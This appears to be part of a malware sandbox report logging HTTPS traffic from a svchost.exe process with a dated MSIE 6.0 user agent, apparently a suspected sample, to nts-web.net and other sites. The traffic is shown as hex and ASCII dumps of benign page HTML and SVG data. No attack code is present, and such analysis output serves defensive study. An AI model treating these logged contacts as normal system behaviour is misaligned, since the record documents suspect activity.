                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6443INData Raw: 22 20 61 6c 74 3d 22 53 61 6c 69 65 6e 74 22 20 2f 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 20 6e 6f 70 61 64 64 69 6e 67 61 6c 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 65 64 20 67 2d 62 67 2d 33 20 67 2d 61 6e 69
                                                                                                                                                                                                                                                                          Data Ascii: " alt="Salient" /></div></div></div></div></div></div><div class="g-grid"><div class="g-block size-100 nopaddingall"><div class="g-content"><div class="moduletable "><div class="g-animatedblock "><div class="g-animatedblock-animated g-bg-3 g-ani
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6444INData Raw: 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 64 65 73 63 22 3e 3c 61 20 63 6c 61 73 73 3d 22 70 6f 72 74 61 66 6f 6c 69 6f 5f 68 6f 6d 65 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 73 65 72 76 69 63 69 6f 2f 61 70 6f 79 6f 2d 64 69 61 67 6e 6f 73 74 69 63 6f 22 3e 41 70 6f 79 6f 20 44 69 61 67 6e c3 b3 73 74 69 63 6f 3c 2f 61 3e 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 66 69 67 75 72 65 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20
                                                                                                                                                                                                                                                                          Data Ascii: div class="g-promoimage-icon"></div><div class="g-promoimage-desc"><a class="portafolio_home" href="/index.php/somos-especialistas/servicio/apoyo-diagnostico">Apoyo Diagnstico</a></div> </div></figure></div> </div></div></div><div class="g-block
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6446INData Raw: 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 32 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 20 63 65 6e 74 65 72 20 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 68 6f 6d 65 22 3e 0a 3c 66 69 67 75 72 65 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 65 66 66 65 63 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 62 75 74 74 6f 6e 20 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 68 6f 6d 65 2f 63 61 6e 67 75 72 6f 2d 62 61 6a 61 2e 6a 70 67 22 20 61 6c 74 3e 0a 3c 64 69
                                                                                                                                                                                                                                                                          Data Ascii: "g-block size-20"><div class="g-content"><div class="moduletable "><div class="g-promoimage center g-promoimage-home"><figure class="g-promoimage-effect"><span class="g-promoimage-iconbutton "></span><img src="/images/home/canguro-baja.jpg" alt><di
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6447INData Raw: 3d 22 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 66 65 61 74 75 72 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 2d 38 31 32 34 22 20 63 6c 61 73 73 3d 22 67 2d 77 72 61 70
                                                                                                                                                                                                                                                                          Data Ascii: ="spacer"></div></div></div></div></section><section id="g-feature"><div class="g-container"> <div class="g-grid"><div class="g-block size-100"><div class="spacer"></div></div></div></div></section><section id="g-container-8124" class="g-wrap
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6448INData Raw: 30 32 33 2d 20 4f 70 63 69 c3 b3 6e 20 31 20 63 69 74 61 20 64 65 20 6f 6e 63 6f 6c 6f 67 c3 ad 61 2d 20 4f 70 63 69 c3 b3 6e 20 32 20 70 72 6f 67 72 61 6d 61 63 69 c3 b3 6e 20 64 65 20 63 69 72 75 67 c3 ad 61 2d 20 4f 70 63 69 c3 b3 6e 20 33 20 6f 74 72 61 73 20 63 69 74 61 73 20 3c 62 72 3e 0a 48 6f 72 61 72 69 6f 20 64 65 20 61 74 65 6e 63 69 c3 b3 6e 3a 20 4c 75 6e 20 2d 20 56 69 65 20 37 3a 30 30 20 61 2e 6d 2e 20 61 20 35 3a 30 30 20 70 2e 6d 2e 20 6a 6f 72 6e 61 64 61 20 43 6f 6e 74 69 6e 75 61 2e 0a 3c 2f 62 72 3e 3c 62 72 3e 3c 2f 62 72 3e 0a 3c 73 74 72 6f 6e 67 3e 43 69 74 61 73 20 50 72 6f 67 72 61 6d 61 20 43 61 6e 67 75 72 6f 3a 20 3c 70 3e 36 30 37 36 34 33 30 30 32 36 20 45 78 74 2e 33 36 31 2d 33 36 34 20 2d 20 3c 62 72 3e 20 3c 73 74 72
                                                                                                                                                                                                                                                                          Data Ascii: 023- Opcin 1 cita de oncologa- Opcin 2 programacin de ciruga- Opcin 3 otras citas <br>Horario de atencin: Lun - Vie 7:00 a.m. a 5:00 p.m. jornada Continua.</br><br></br><strong>Citas Programa Canguro: <p>6076430026 Ext.361-364 - <br> <str
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6450INData Raw: 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 43 61 6c 6c 65 20 34 38 20 23 20 32 35 2d 35 36 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 43 61 6c 6c 65 20 34 38 20 23 20 32 35 2d 35 36 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 4e 75 65 76 6f 20 53 6f 74 6f 6d 61 79 6f 72 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 4e 75 65 76 6f 20 53 6f 74 6f 6d 61 79 6f 72 3c 2f 64 69 76 3e 20 3c 2f 64 69
                                                                                                                                                                                                                                                                          Data Ascii: act-item"><div class="g-contact-label">Calle 48 # 25-56</div> <div class="g-contact-text">Calle 48 # 25-56</div> </div><div class="g-contact-item"><div class="g-contact-label">Nuevo Sotomayor</div> <div class="g-contact-text">Nuevo Sotomayor</div> </di
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6451INData Raw: 68 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 20 73 69 7a 65 2d 33 33 2d 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6c 6f 67 6f 2d 32 34 34 34 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 61 20 68 72 65 66 3d 22 2f 22 20 74 69 74 6c 65 20 72 65 6c 3d 22 68 6f 6d 65 22 20 63 6c 61 73 73 3d 22 67 2d 66 6f 6f 74 65 72 2d 6c 6f 67 6f 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 32 30 32 31 2f 49 63 6f 6e 74 65 63 5f 4c 6f 67 6f 2e 6a 70 67 22 20 61 6c 74 3d 22 43 6c 69 6e 69 63 61 20 53 61 6e 20 4c
                                                                                                                                                                                                                                                                          Data Ascii: ht"><div class="g-container"> <div class="g-grid"><div class="g-block size-33-3"><div id="logo-2444-particle" class="g-content g-particle"> <a href="/" title rel="home" class="g-footer-logo"><img src="/images/2021/Icontec_Logo.jpg" alt="Clinica San L
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6452INData Raw: 34 62 64 0d 0a 69 76 3e 0a 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 73 72 63 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 63 72 69 70 74 73 2f 35 63 35 64 64 37 32 38 2f 63 6c 6f 75 64 66 6c 61 72 65 2d 73 74 61 74 69 63 2f 65 6d 61 69 6c 2d 64 65 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 70 69 6e 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 74 3b 22 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22
                                                                                                                                                                                                                                                                          Data Ascii: 4bdiv><script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script type="text/javascript" src="/media/gantry5/assets/js/main.js"></script><p class="pin"><span style="font-size: 10pt;"><div style="
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6453INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          65192.168.2.6498149.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6363OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: nts-web.net
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6555INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:47 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Content-Length: 2599149
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Last-Modified: Tue, 08 Nov 2022 00:53:41 GMT
                                                                                                                                                                                                                                                                          ETag: "27a8ed-5eceaf89b8f40"
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6555INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 20 77 65 62 73 69 74 65 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 77 65 62 73 69 74 65 23 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69
                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="ja"> <head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# website: http://ogp.me/ns/website#"> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="wi
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6653INData Raw: 77 69 64 74 68 3a 31 2e 30 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 32 2c 2e 63 6c 73 2d 31 36 33 7b 66 69 6c 6c 3a 23 39 32 64 31 64 37 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 35 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 39 37 70 78 3b 7d 2e 63 6c 73 2d 31 36 32 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 31 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 33 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 32 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 34 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 35 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 35 7b 66 69 6c 6c 3a 23 65 65 65 39 34 32 3b 7d 2e 63 6c 73 2d 31 36 36 7b 66 69 6c 6c 3a 23 65 34 38 32 37 65 3b 7d 2e 63 6c 73 2d 31 36 37 7b 66 69 6c 6c 3a 23 38 36 63 64 64 34 3b 7d 2e 63
                                                                                                                                                                                                                                                                          Data Ascii: width:1.04px;}.cls-161,.cls-162,.cls-163{fill:#92d1d7;}.cls-161,.cls-165{stroke-width:0.97px;}.cls-162{stroke-width:1.15px;}.cls-163{stroke-width:1.25px;}.cls-164{stroke-width:1.54px;}.cls-165{fill:#eee942;}.cls-166{fill:#e4827e;}.cls-167{fill:#86cdd4;}.c
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6669INData Raw: 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 36 39 32 2e 38 33 2c 31 39 35 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 36 39 32 2e 36 2c 31 38 38 2e 31 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34
                                                                                                                                                                                                                                                                          Data Ascii: 1,.15,2.86"/><path class="cls-4" d="M692.83,195a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M692.6,188.1a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6752INData Raw: 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 32 33 2e 33 35 2c 32 36 33 2e 34 31 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 32 33 2e 31 32 2c 32 35 36 2e 34 38 61 31
                                                                                                                                                                                                                                                                          Data Ascii: 2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M723.35,263.41a1.71,1.71,0,0,1-.77,2.23,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M723.12,256.48a1
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6768INData Raw: 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: ,0,0,1,.51-2.89,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6768INData Raw: 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 33 2e 38 38 2c 33 33 31 2e 37 39 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 33 2e 36 34 2c 33 32 34 2e 38 36 61 31 2e 37 31 2c 31 2e 37 31
                                                                                                                                                                                                                                                                          Data Ascii: 24,2.24,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M753.88,331.79a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M753.64,324.86a1.71,1.71
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6784INData Raw: 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 30 2e 37 39 2c 32 30 36 2e 32 37 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 30 2e 35 35 2c
                                                                                                                                                                                                                                                                          Data Ascii: ,1,.51-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M770.79,206.27a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"/><path class="cls-4" d="M770.55,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6800INData Raw: 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 31 2e 33 31 2c 32 37 34 2e 36 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73
                                                                                                                                                                                                                                                                          Data Ascii: 34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M801.31,274.66a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.52-2.89,2.24,2.24,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC6930INData Raw: 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 31 2e 38 34 2c 33 34 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 2f 3e 3c 70
                                                                                                                                                                                                                                                                          Data Ascii: 1,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M831.84,343a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"/><p
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC6946INData Raw: 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 38 2e 37 35 2c 32 31 37 2e 35 32 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c
                                                                                                                                                                                                                                                                          Data Ascii: 73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.41,2.41,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M848.75,217.52a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,
